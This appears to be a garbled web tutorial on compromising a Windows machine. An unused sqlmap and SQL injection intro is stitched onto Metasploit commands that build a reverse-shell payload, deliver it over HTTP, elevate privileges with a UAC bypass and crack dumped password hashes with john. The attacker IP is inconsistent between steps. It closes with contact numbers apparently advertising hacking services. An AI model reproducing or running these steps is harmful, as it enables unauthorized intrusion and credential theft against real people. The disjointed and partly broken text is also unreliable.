There are many SQL injection tools, but probably the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website.
SQL Injections or SQLi, is where arbitrary code is injected into a website via its URL to force the database to reveal information.
A simple SQLi possible URL could be, (url)/index.php?id=1 and to test if it is vulnerable just add a simple ’ to the end of the URL.
Illegal way to access someone’s computer that’s call system hacking a hacker hack the system using the malware, payload, and virus, Some hacking types are perfectly legal, One of the most important methods used by hackers in order to circumvent the standard authentication is password cracking.
It is actually the very first step in the system hacking process. a hacker needs to physically access the target system and inject the payload target system. Let’s try some example
Windows System Hacking
First we create a payload using the metasploit framework simple run the command. payload is the part of transmitted data that is the actual intended message.
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe > hackNos.exe
- -p Payload to use
- lhost Attacker IP address
- lport Attacker listing port
- -f Output formate
- > Payload output filename
and we start our Metasploit payload listener and load the module multi handler
msfdb run use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 172.20.10.4 set lport 4545 run
our TCP handler is start now we start any server I use python SimpleHTTPServer for transferring our payload target system.
python -m SimpleHTTPServer 80
open any browser and download the payload target system
our download is complete now click the open button and execute the payload
Now we have meterpreter shell target machine run the sysinfo command it’s output show about system information.
we move on our next step dump all hashes but first, we migrate our payload with another running process ps command is show all running process target machine
ps migrate 4040
and run the getsystem command for administrator account access and we face a error priv_elevate_system we have now permission for administrator account access we can bypass the error using the post exploitation moudule
get system background
run the session in background and load the module bypassuac_eventvwr and set the session name
use exploit/windows/local/bypassuac_eventvwr set session 1 run
and new meterpreter session is open again run the getsystem command our command is run successfully
Window hash Cracking
save the hash in a file and using the john tool we can crack the hash –word lists choose your word-lists path
cat hash.txt john --wordlists=/usr/share/wordlists/rockyou.txt --format=NT hash.txt
THIS ARTICLE IS STRICTLY FOR EDUCATIONAL PURPOSE AND NOT MEANT TP SUPPORT OR PROMOTE ANY ILLEGAL ACTIVITY.
for more information contact or go on www.alienmanhackers.xyz
CALL OR TEXT: +13603603875
SIGNAL : +16469229088